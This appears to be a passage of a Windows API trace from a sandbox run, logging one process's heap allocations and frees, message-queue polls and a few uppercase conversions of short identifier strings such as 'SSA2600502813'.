[0121.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0121.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0121.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0121.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14d04) returned 0x2ac4120 [0121.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ac4120 | out: hHeap=0x2af0000) returned 1 [0121.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0121.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0121.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0121.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0121.967] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0121.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0121.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0121.968] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0121.968] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0121.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0121.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0121.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14d04) returned 0x2ac4120 [0121.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0121.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72378 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0121.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0121.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fb8 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0121.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0121.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0121.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14d04) returned 0x2a8a138 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0121.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0121.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0121.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0121.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0121.973] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0121.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0121.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0121.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0121.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0121.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0121.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0121.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0121.974] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0121.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0121.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0121.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0121.975] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0121.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0121.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0121.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0121.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0121.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0121.976] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0121.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0121.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0121.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0121.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0121.976] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0121.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0121.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0121.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0121.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0121.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0121.977] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0121.977] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0121.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0121.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa168 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0121.977] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0121.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0121.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0121.977] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0121.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0121.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0121.978] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0121.978] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0121.978] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3f0 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748b0 [0121.978] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0121.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0121.978] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0121.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0121.979] HeapFree (in: hHeap=0x2af0000, 